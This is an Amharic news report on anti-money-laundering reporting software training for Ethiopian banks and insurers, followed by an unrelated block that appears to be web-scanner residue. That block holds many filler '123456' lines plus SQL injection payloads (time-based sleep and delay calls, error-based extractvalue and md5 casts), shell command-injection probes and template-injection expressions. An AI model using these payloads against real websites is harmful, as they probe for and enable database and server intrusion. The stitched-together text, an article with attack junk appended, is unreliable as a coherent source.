የፋይናንስ ግብይት ሪፖርት ማድረጊያ ሶፍትዌር ላይ ስልጠና ተሰጠ
በወንጀል ድርጊት የተገኘ ገንዘብ ወይም ንብረት ህጋዊ አስመስሎ ማቅረብና ሽብርተኝነትን በገንዘብ የመርዳት ወንጀሎችን ለመከላከልና ለመቆጣጠር እንዲቻል Anti Money Laundering Software (AML software) በመባል በሚታወቀው ሶፍትዌር አጠቃቀም ላይ የካቲት 11 እና 12 ቀን 2016 ዓ.ም ለባንኮች እና የመድን አገልግሎት ሰጪ ኩባንያዎች ስልጠና ተሰጠ።
በሶፍትዌር አጠቃቀሙ ላይ ስልጠናው የተሰጠው በፋይናንስ ደህንነት አገልግሎት እና በኢንፎርሜሽን መረብ ደህንነት አስተዳደር በጋራ ሲሆን ወንጀሎቹን ለመከላከልና ለመቆጣጠር በሚደረገው ሂደት ባንኮች እንዲሁም የመድን አገልግሎት ሰጪ ኩባንያዎች በህግ በተቀነጠው መሰረት የጥሬ ገንዘብ እና የጥርጣሬ ግብይት መረጃዎችን ለአገልግሎቱ በቀጥታ መላክ የሚያስችላቸው ነው።
የፋይናንስ ደህንነት አገልግሎት የዓለም አቀፍ የህግ ግዴታዎች ከፍተኛ ባለሙያ አቶ ወንድወሰን አበበ በስልጠናው ወቅት እንደተናገሩት በወንጀል ድርጊት የተገኘ ገንዘብ ወይም ንብረት ህጋዊ አስመስሎ ማቅረብና ሽብርተኝነትን በገንዘብ የመርዳት ወንጀሎችን ለመከላከል የፋይናንስ ተቋማት (ባንኮች እና የመድን አገልግሎት ሰጪ ኩባንያዎች) ከፍተኛ ኃላፊነት የተጠለባቸው ናቸው። በመሆኑም ተቋማቱ ለፋይናንስ ደህንነት አገልግሎት የጥሬ ገንዘብ እና አጠራጣሪ ግብይት ሪፖርት ማድረግ የሚጠበቅባቸው በመሆናቸው ለዚህ ስርዓት የተዘጋጀውን የAML ሶፍትዌር በመጠቀም ሪፖርት ማድረግ እንዳለባቸው ተገልጿል።
የፋይናንስ ድርጊት ግብረ-ሃይል በመባል የሚታወቀው ዓለም አቀፍ ተቋም ዋና አላማ ወንጀሎቹን በመከላከልና በመቆጣጠር ረገድ ዓለም አቀፍ መስፈርቶችን በማውጣት እና የአገራት አፈጻጸም ላይ ክትትል ውጤታማነትን ማረጋገጥ መሆኑን የጠቀሱት አቶ ወንደወሰን ባንኮች እና የመድን አገልግሎት ሰጪ ኩባንያዎች እንደ ሪፖርት አቅራቢ ተቋማት ወንጀሎቹን ከመከላከል አንጻር ኃላፊነት የተጣለባቸው በመሆናቸው ግዴታቸውን ለመወጣት የተዘረጋው ስርዓት አጋዥ መሆኑን ገልጸዋል። በኢንፎርሜሽን መረብ ደህንነት አስተዳደር በኩል በተዘጋጀው ሶፍትዌር ላይ ስልጠናውን የሰጡት ወ/ሮ ቃልኪዳን ጥበቡ የAML ሶፍትዌሩ ልዩ ልዩ ፎርማቶች ያሉት መሆኑን ጠቅሰው ተቋማቱ አጠራጣሪ ጉዳዮችን ሲኖሩ በቀጥታ ለፋይናንስ ደህንነት አገልግሎት ሪፖርት ማድረግ እንደሚያስችላቸው አብራርተዋል።
የፋይናንስ ደህንነት አገልግሎት ከኢንፎርሜሽን መረብ ደህንነት አስተዳደር ጋር በመተባበር በወንጀል ድርጊት የተገኘ ገንዘብ ወይም ንብረት ህጋዊ አስመስሎ ማቅረብና ሽብርተኝነትን በገንዘብ የመደገፍ ወንጀሎችን ለመከላከልና ለመቆጣጠር የፋይናንስ ተቋማት ለአገልግሎቱ ሪፖርት የሚያቀርቡበት ሶፍትዌር እንዲለማ በማድረግ ስራ ላይ ያዋለ ሲሆን ስተሙን በመጠቀም ወደ ሪፖርቱ ስርዓቱ በተሟላ ደረጃ ላልገቡ የፋይናንስ ተቋማት የግንዛቤ ማስጨበጫ ስልጣናዎችን በመስጠት የመረጃ ልውውጡን ፈጣንና ቀልጣፋ ለማድረግ እየሰራ ይገኛል።
mZdQqV
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('a',5)='a
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('e',0)='e
123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('w',5)
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('d',0)
123456'and(select+1)>0waitfor/**/delay'0:0:5
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456/**/and(select+1)>0waitfor/**/delay'0:0:5'/**/
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
123456'/**/and(select'1'from/**/pg_sleep(5))::text>'0
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456/**/and(select+1/**/from/**/pg_sleep(5))>0/**/
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456"and(select*from(select+sleep(5))a/**/union/**/select+1)="
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456'and(select*from(select+sleep(5))a/**/union/**/select+1)='
123456'"\(
123456鎈'"\(
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1041780657')))>'0
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1499192069')))
123456/**/and/**/cast(md5('1304025533')as/**/int)>0
(select*from(select+sleep(5)union/**/select+1)a)
123456'and(select'1'from/**/cast(md5(1906689315)as/**/int))>'0
(select*from(select+sleep(0)union/**/select+1)a)
extractvalue(1,concat(char(126),md5(1827367696)))
expr 906329238 + 872075364
123456"and/**/extractvalue(1,concat(char(126),md5(1001790580)))and"
123456'and/**/extractvalue(1,concat(char(126),md5(1475528097)))and'
123456&set /A 902636298+948643065
123456
123456$(expr 942473139 + 808897364)
123456
123456|expr 955309357 + 821995225
123456
123456 expr 986630026 + 889207292
123456
123456
123456
123456
'-var_dump(md5(643074524))-'
<%- 923937154+978997581 %>
123456
#set($c=935715288+946740025)${c}$c
${@var_dump(md5(476315677))};
aldnjocjnerjevjfcenu
${(844311678+923358262)?c}
123456
123456
${940041300+971355855}
123456
/*1*/{{865521121+846761582}}
123456
123456"and"u"="b
123456
123456
123456"and"v"="v
123456
123456
123456'and'w'='u
123456
${900220693+940104524}
123456'and'm'='m
123456
123456
123456
123456/**/and+2=9
123456
123456/**/and+2=2
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456